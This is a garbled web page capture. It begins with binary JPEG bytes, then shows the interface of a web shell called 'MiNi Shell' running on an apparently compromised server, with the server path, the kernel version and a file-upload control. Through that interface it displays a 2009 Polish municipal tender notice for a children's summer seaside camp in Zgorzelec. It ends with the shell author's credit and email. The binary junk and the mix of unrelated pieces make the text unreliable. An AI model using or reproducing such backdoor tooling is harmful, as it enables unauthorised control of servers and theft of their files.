JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/127070-N-2009.html

<p class="kh_header"><b>Zgorzelec: Organizacja wypoczynku letniego dla dzieci i młodzieży w okresie wakacyjnym - lato 2009 w miejscowości nadmorskiej województwa zachodniopomorskiego</b><br>
<b>Numer ogłoszenia: 127070 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zgorzelec , ul. Kościuszki 70, 59-900 Zgorzelec, woj. dolnośląskie, tel. 075 7721435.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.zgorzelec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja wypoczynku letniego dla dzieci i młodzieży w okresie wakacyjnym - lato 2009 w miejscowości nadmorskiej województwa zachodniopomorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja wypoczynku letniego dla dzieci i młodzieży z Gminy Zgorzelec w okresie wakacyjnym - lato 2009 w miejscowości nadmorskiej województwa zachodniopomorskiego - 2 turnusy (13-14 dniowe) po 45 osób.
Wymagania dotyczące organizacji i wyboru ośrodka wypoczynkowego:
1. Zakwaterowanie:
1.1. W ośrodku wypoczynkowym, budynek murowany (Zamawiający zastrzega, iż nie może to być budynek szkolny lub hala sportowa).
1.2. Ośrodek w miejscowości nadmorskiej w odległości nie większej niż 500m od morza - województwo zachodniopomorskie.
1.3. Ośrodek ogrodzony, usytuowany z dala od dróg o dużym natężeniu ruchu.
1.4. Na terenie ośrodka wypoczynkowego winna znajdować się:
- sala telewizyjna (świetlica), wyposażona w sprawny TV, video lub DVD, gry planszowe, układanki itp.;
- sala dyskotekowa ze sprawnym sprzętem dyskotekowym;
- na terenie lub w bezpośrednim sąsiedztwie ośrodka winien znajdować się telefon ogólnie dostępny;
- boiska sportowe: np. do piłki nożnej, koszykowej, siatkowej z dobrze utrzymaną nawierzchnią;
- sprzęt sportowy (np. piłki do gier zespołowych, paletki służące do gry rekreacyjnej itp.).
1.5. Uczestnicy powinni być zakwaterowani w jednym budynku, w pokojach 2-4 osobowych z pełnym węzłem sanitarnym lub ogólnodostępnym na korytarzu (minimum jeden prysznic na 10-u uczestników) z bieżącą wodą ciepłą i zimną. Pokoje dla kadry pedagogicznej 1-2 osobowe.
1.6. Wyposażenie pokoi standardowe:
- sprzęt niezniszczony;
- tapczany, szafy z półkami i wieszakami, szafki, stoły, krzesła;
- pościel niezniszczona;
- ściany, sufity, podłogi oraz okna czyste, pomalowane;
- łazienki czyste, ze sprawnym wyposażeniem;
- utrzymanie czystości przez cały czas trwania każdego turnusu pomieszczeń sanitarnych, korytarzy, schodów, itp.
2. Wyżywienie
2.1. Całodzienne, obejmujące 4 posiłki tj.: śniadanie, obiad, podwieczorek i kolację. Napoje dostępne bez ograniczeń.
2.2 Posiłki urozmaicone z owocami, przystawkami i napojami.
2.3 Stołówka powinna zmieścić całą grupę w jednej turze.
2.4 Każdy turnus rozpoczyna się obiadokolacją w pierwszym dniu pobytu i kończy śniadaniem w ostatnim dniu pobytu + suchy prowiant oraz napoje na drogę powrotną.
3. Program rekreacyjno sportowy
3.1 Zorganizowanie min. dwóch wycieczek autokarowych.
3.2 Zapewnienie programu z profilaktyki uzależnień.
3.3 Ognisko z pieczeniem kiełbasek - min. 2 razy.
3.4 Zajęcia sportowe i rozrywkowe (np. konkursy i zawody sportowe z nagrodami, piesze wycieczki itp.).
3.5 Zorganizowanie dyskotek wg zapotrzebowania.
3.6 Plażowanie i kąpiele morskie - pod nadzorem ratownika.
4. Opieka medyczna
4.1. Opieka medyczna (pielęgniarka na terenie ośrodka, lekarz jeżeli nie na terenie to na wezwanie personelu). Lekarstwa zapewnia Wykonawca na własny koszt. W przypadku choroby uczestnika kolonii wymagana jest izolatka oddzielnie dla chłopców i dziewcząt. 
5. Opieka ratownika
5.1. Zabezpieczenie opieki ratownika uczestnikom kolonii w czasie kąpieli morskich.
6. Kadra pedagogiczna
6.1. Wykwalifikowana kadra pedagogiczna (1 wychowawca na 15 dzieci) zdolna do zrealizowania zamówienia, w tym 2 wychowawców na każdym turnusie wyznaczonych przez Zamawiającego. Pobyt oraz wynagrodzenie za pracę opiekunów ze strony Zamawiającego oraz ze strony Wykonawcy pokrywa Wykonawca.
7. Transport
7.1. Transport autokarowy zabezpiecza Wykonawca w obie strony (godziny odjazdu i przyjazdu uczestników kolonii zostaną ustalone przez Wykonawcę - uwzględniając, że każdy turnus rozpoczyna się obiadokolacją w pierwszym dniu pobytu i kończy śniadaniem w ostatnim dniu pobytu).
7.2 Autokar winien być wyposażony w klimatyzację, sprawny technicznie, posiadający w dniu wyjazdu wszystkie aktualne dokumenty wymagane do przewozów pasażerów.
7.3 W przypadku awarii autokaru lub innych nie przewidzianych zdarzeń należy podstawić inny sprawny autokar w ciągu 2 godzin.
8. Ubezpieczenie
8.1. Ubezpieczenie uczestników kolonii od następstw nieszczęśliwych wypadków na okres trwania kolonii oraz w czasie przejazdu ponosi Wykonawca. Najpóźniej w dniu rozpoczęcia turnusu Wykonawca zobowiązany będzie przedstawić Zamawiającemu potwierdzenie ubezpieczenia.
9. Zapewnienie wszystkich uzgodnień regulowanych przepisami w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz.U. Nr 12 poz. 67 z dn. 21 stycznia 1997r. z późn. zm.).
10. Najpóźniej w dniu rozpoczęcia turnusu Wykonawca zobowiązany będzie przedstawić Zamawiającemu kartę kwalifikacyjną obiektu potwierdzoną przez Kuratorium Oświaty, Sanepid, Służby Straży Pożarnej oraz Urząd Gminy na lato 2009.
11. Zamawiający zastrzega sobie przed podpisaniem umowy prawo do wcześniejszego sprawdzenia wskazanych przez organizatora ośrodków kolonijno-wypoczynkowych.
12. Wykonawca, w przypadku jego wyboru, zobowiązany jest przed zawarciem Umowy (najpóźniej w dniu podpisania Umowy) podać na piśmie Zamawiającemu termin, miejsce zbiórki i godzinę odjazdu autokaru na poszczególne turnusy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.24.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium przetargowego przed upływem     terminu wyznaczonego do składania ofert (tj. 08.05.2009r. do godz. 10:00), w wysokości 1.000,00 zł (słownie: jeden tysiąc zł).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1  ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2007r. Nr 223 poz.1655 z późn. zm.), tzn.:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
Sposób dokonania oceny spełnienia wymaganych warunków - przy dokonaniu oceny spełnienia wymaganych warunków Zamawiający będzie kierował się regułą /spełnia/ albo /nie spełnia/..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dokumenty jakie muszą złożyć Wykonawcy w niniejszym postępowaniu: 
1.1. Wypełniony Formularz ofertowy (załącznik nr 1 Część III SIWZ);
1.2. Parafowany projekt umowy;
1.3. Informacja jakie części zamówienia Wykonawca zamierza powierzyć podwykonawcom (załącznik nr 2 Część III SIWZ);
1.4. Oświadczenie o spełnieniu warunków zawartych w art. 22 ust. 1 oraz niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych (załącznik nr 3 Część III SIWZ);
1.5. Opis obiektu wraz z podaniem adresu zakwaterowania i wyżywienia. Do oferty należy dołączyć opis pokoi i ich wyposażenia, opis stołówki, łazienek, otoczenia obiektu oraz załączyć zdjęcia, foldery lub płyty CD;   
1.6. Opis programu z profilaktyki uzależnień; 
1.7. Opis przebiegu min. dwóch autokarowych wycieczek;
2. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, Zamawiający żąda następujących dokumentów:
2.1. aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.2. zaświadczenie o wpisie do rejestru organizatorów turystyki i pośredników turystycznych.
3. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
3.1. wykaz zrealizowanych co najmniej dwóch usług zgodnych z przedmiotem zamówienia tj. organizacja wypoczynku dla dzieci i młodzieży w minimum 10 dniowym okresie, o łącznej wartości jednego zamówienia nie mniejszej niż               40.000,00 zł, w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z załączeniem dokumentów potwierdzających, że usługi zostały wykonane należycie - referencje - (załącznik nr 4 Część III SIWZ);
4. W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający żąda następujących dokumentów:
4.1. polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gmina.zgorzelec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zgorzelec , ul. Kościuszki 70, 59-900 Zgorzelec (pok. nr 9).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 10:00, miejsce: Urząd Gminy Zgorzelec , ul. Kościuszki 70, 59-900 Zgorzelec (Biuro Obsługi Klienta).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com